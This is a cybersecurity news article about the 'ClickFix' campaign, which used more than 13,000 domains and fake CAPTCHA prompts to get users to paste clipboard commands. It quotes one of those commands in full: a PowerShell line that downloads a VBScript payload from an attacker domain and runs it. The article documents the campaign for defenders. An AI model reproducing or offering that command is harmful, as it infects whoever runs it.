In mid-2025, Lab539 researchers observed an unexpected surge in a novel browser-based malware campaign dubbed “ClickFix.”
Emerging quietly in July, the threat quickly expanded its reach by registering over 13,000 unique domains designed to lure users into executing malicious commands on their own devices.
The attack leverages compromised or low-cost hosting infrastructure, including a significant portion behind Cloudflare, to deliver payloads via deceptively benign web prompts.
Users encountering these sites are first challenged with a CAPTCHA before being instructed to run a command from their clipboard, granting attackers the ability to deploy arbitrary scripts or executables.
Initially, the volume of ClickFix domains appeared unremarkable amid the vast sea of adversary activity.
However, by mid-August, a remarkable spike raised alarms across multiple threat-intelligence platforms.
Lab539 analysts noted the sudden proliferation of front-end sites that frontload malware delivery under the guise of “verification” steps, a hallmark that distinguishes ClickFix from more traditional phishing or watering-hole attacks.
The scale of domain registration suggested an automated provisioning pipeline, likely fueled by pay-as-you-go registrar services and resold hosting, rather than the manual setup favored by advanced persistent threat actors.
Despite Cloudflare’s dominance among hosting providers, accounting for about 24% of observed ClickFix domains, the campaign’s long tail of nearly 500 other providers reveals a strategic use of diverse infrastructure to evade simple blocklists.
Regional VPS services in the United States, Germany, Indonesia, and Brazil feature prominently, reflecting both global distribution and opportunistic compromise of third-party servers.
In many cases, attackers repurpose stale or misconfigured subdomains—such as decades-old academic or municipal hosts—to blend malicious traffic with legitimate DNS records.
.webp "Hackers Registered 13,000+ Unique Domains and Leverages Cloudflare to Launch Clickfix Attacks 3")
Infection Mechanism and Payload Delivery
The core infection mechanism relies on leveraging the browser’s clipboard API to plant a command that the user unwittingly pastes into a terminal.
Once a CAPTCHA completes, the site writes a PowerShell command sequence like the following to the clipboard:-
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMPcaptcha.vbs; Start-Process $env:TEMPcaptcha.vbsThis single line downloads and executes a VBScript payload without further user interaction, exemplifying the campaign’s emphasis on social engineering over exploit chaining.
Variations include direct executable downloads and obfuscated scripts, indicating multiple operators employing the ClickFix framework.
The ubiquity of this mechanism underscores how minimal technical sophistication can still yield large-scale intrusion opportunities when combined with automated domain registration and global hosting assets.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
